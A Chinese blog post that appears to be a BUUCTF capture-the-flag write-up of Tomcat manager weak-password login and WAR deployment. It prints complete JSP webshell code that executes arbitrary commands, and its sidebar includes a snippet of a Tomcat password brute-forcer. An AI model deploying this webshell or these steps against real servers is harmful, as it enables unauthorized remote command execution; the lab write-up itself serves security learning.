[Tomcat]Tomcat8+ Weak Password && Backend Getshell Vulnerability

最新推荐文章于 2024-05-11 11:09:50 发布
最新推荐文章于 2024-05-11 11:09:50 发布
阅读量686 收藏 2
点赞数
分类专栏: buuctf real 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36241198/article/details/115062698
版权

弱密码+getshell

在这里插入图片描述
访问http://node3.buuoj.cn:25141/manager/html
弱密码 tomcat tomcat

在这里插入图片描述
在这个后台,我们可以操作每个应用的状态……以及读取每个应用下的Session。

但是这都不是最大的安全隐患

制作war包。

war包:Java web工程,都是打成war包,进行发布,如果我们的服务器选择TOMCAT等轻量级服务器,一般就打出WAR包进行发布

准备好jsp一句话木马,在安装好JDK环境,执行:jar -cvf [war包名称].war 打包目录

也可以将jsp压缩为zip,再将zip后缀改名为war,然后上传war包
在这里插入图片描述
现在已经打包好了一个WAR包。
找到Tomcat管理页面中的WAR file to deploy进行上传部署了。
在这里插入图片描述

在这里插入图片描述
应用列表已经出现了我们的目录
在这里插入图片描述

访问http://node3.buuoj.cn:25141/test/1.jsp
在这里插入图片描述

jsp一句话木马

<%
    if("023".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>

1.jsp?pwd=023&i=ls
在这里插入图片描述
env打印环境变量
在这里插入图片描述
拿到flag!

exploitsec
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Tomcat7+ Weak Password && Backend Getshell VulnerabilityTomcat7+弱密码&&后端Getshell漏洞)
m0_46693276的博客
02-22 275
如果遇到有部署tomcat的应用,可以去访问下地址:ip+端口,一般是8080,如:http://192.168.60.131:8080。若管理员没有将tomcat的管理界面关闭,我们可以去用Burpsuite破解密码。tomcattomcat 1. 目录 1.访问tomcat 2.登录tomcat 3.找一个jsp的馬,放在jdk文件的bin目录下。(上传的馬会附在文章结尾) 4,在jdk的bin目录下,打开命令行(shift+ctrl 右键),然后输入:jar -cvf 1.war ./.
[vulhub]Tomcat8+ 弱口令 && 后台getshell漏洞复现
feigerger的博客
09-07 161
将jsp大马打包为war包。上传后显示上传的路径。
Tomcat 弱口令漏洞复现
weixin_53696027的博客
02-13 916
vulhub靶场漏洞复现详细过程
Tomcat7+ 弱口令 && 后台getshell漏洞
最新发布
weixin_45653478的博客
05-11 1025
Tomcat 是一个流行的开源Web应用服务器,用于部署和运行Java Web应用程序。Tomcat 7+ 版本中存在一个安全隐患,即默认的管理员密码可能较弱或者未被修改,攻击者可以利用这一漏洞登录到Tomcat的管理后台,并上传恶意的WAR包来执行任意代码。
Tomcat7_weakpasswd 弱口令 漏洞复现
ADummy的博客
02-04 787
Tomcat 7 +弱口令 by ADummy 0x00利用路线 ​ tomcat弱口令登录后台—>后台具有上传文件的功能—>上传木马—>getshell 0x01漏洞介绍 ​ Apache+Tomcat是很常用的网站解决方案,Apache用于提供web服务,而Tomcat是Apache服务器的扩展,用于运行jsp页面和servlet。Tomcat有一个后台管理界面,使用具有权限的用户登录后台,可上传war包(webshell)部署到web目录下。getshell 0x02前置知识
Tomcat 弱密码爆破 漏洞复现
Senimo
05-03 4468
Tomcat 弱密码爆破漏洞一、漏洞描述二、漏洞影响三、漏洞复现1、环境搭建2、漏洞复现四、漏洞POC五、参考链接 一、漏洞描述 Tomcat有一个管理后台,其用户名和密码在Tomcat安装目录下的conf\tomcat-users.xml文件中配置,不少管理员为了方便,经常采用弱口令。Tomcat 支持在后台部署 war 文件,可以直接将 webshell 部署到 web 目录下。其中,欲访问后台,需要对应用户有相应权限。 Tomcat7+ 权限分为: manager(后台管理) manager-gui
【漏洞复现】Tomcat弱口令+后台getshell
m0_52450604的博客
02-07 670
【漏洞复现】Tomcat弱口令+后台getshell
tomcat-weak-password-scanner
03-01
扫描tomcat弱口令
C&C++ 语言程序设计技巧
12-15
8. **RAII(Resource Acquisition Is Initialization)**:这是一种资源管理策略,确保资源在不再需要时被正确释放。智能指针如`unique_ptr`、`shared_ptr`和`weak_ptr`是实现RAII的关键。 9. **C++11及以后的新...
Allocation & Reclaim
11-18
3. 智能指针:C++提供智能指针如unique_ptr、shared_ptr和weak_ptr,它们在适当时候自动释放所指向的内存,有助于防止内存泄漏。 4. 内存池:内存池是一种优化策略,预先分配一大块内存,然后从中切割小块分配给...
Weblogic-Weakpassword-Scnner
05-01
Weblogic-弱密码-Scnner 点安装请求您可以使用masscan扫描具有CIDR格式的ip范围masscan -iL ip.txt -oL 7001.txt -...效率比以前更高1.python spider.py Scand.txt 2.python brute.py 也可以与一起使用以自动部署战争包
weak-password-detect
03-14
弱密码检测
python3实现多线程破解tomcat简单密码
09-16
python3 http.client库实现的登录验证密码程序。 内含多个密码文件。 for server in ip: print( "[+] Server:",server) print ("[+] Port:",port) print ("[+] Users Loaded:",len(WEAK_USERNAME)) print( "[+] Words Loaded:",len(WEAK_PASSWORD)) print ("[+] Started",timer(),"\n") for I in range(len(accounts)): work = Tomcatbrute(server,port,path,accounts[I][0],accounts[I][1]) work.setDaemon(1) work.start() time.sleep(0.1) print( "\n[-] Done -",timer(),"\n" )
Tomcat8 + 弱口令 && 后台getshell 漏洞复现
Jerry____的博客
12-04 1750
一:搭建环境 1、进入相关漏洞目录下 cd /vulhub/tomcat/tomcat8 2、一键安装环境 docker-compose up -d 二:漏洞利用 1、打开http://your-ip:8080/manager/html,输入弱密码tomcat:tomcat。 2、制作木马文件,首先准备一个ma.jsp木马,压缩成ma.zip,再修改后缀名为ma.war。 ma.jsp &lt...
Vulhub - Tomcat8 + 弱口令 && 后台getshell 漏洞复现
多崎巡礼的博客
11-08 7346
VulHubTomcat8+ 弱口令 &amp;amp;amp;&amp;amp;amp; 后台getshell 漏洞环境实验 1.启动docker镜像 docker基于Ubuntu 已搭建完成。 拉取项目git clone https://github.com/vulhub/vulhub.git 进入镜像:cd vulhub/tomcat/tomcat8/ 启动环境:docker-compose up -d 2.登录tomca...
portal 常见漏洞与解决方法(基于 Tomcat8.5)
alexpdh的博客
08-09 3983
看着这么多需要修复的感觉整个人都不好了[捂脸]。借着一次修复过程,总结下常见的 Web 应用的优化和漏洞防护。由于使用的容器是 Tomcat,所以对 Tomcat进行优化能解决大部分问题。 COOKIE 常用属性设置 添加 httponly=true 和 Secure=true httponly 能有效防止 XXS 攻击。 Secure 设置是否只能通过https来传递此条...
Tomcat8.5.23 版本漏洞分析
本博客纯属个人网络笔记,如对阁下有用,甚喜;否则,关掉即可,不喜勿喷。专心写代码,不做键盘侠!
08-07 8530
背景 系统漏洞扫描发现了tomcat版本存在安全绕过漏洞,百度了一下这个漏洞的信息: Apache Tomcat中存在安全绕过漏洞。攻击者可借助恶意的Web应用程序利用该漏洞绕过安全限制。以下版本受到影响:Apach Tomcat 9.0.0.M1至9.0.0.M9版本,8.5.0至8.5.4版本,8.0.0.RC1至8.0.36版本,7.0.0至7.0.70版本,6.0.0至6.0.4...
弱口令/密码字典
猪肉炖白菜
06-12 3239
https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm CrackStation的密码破解词典
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值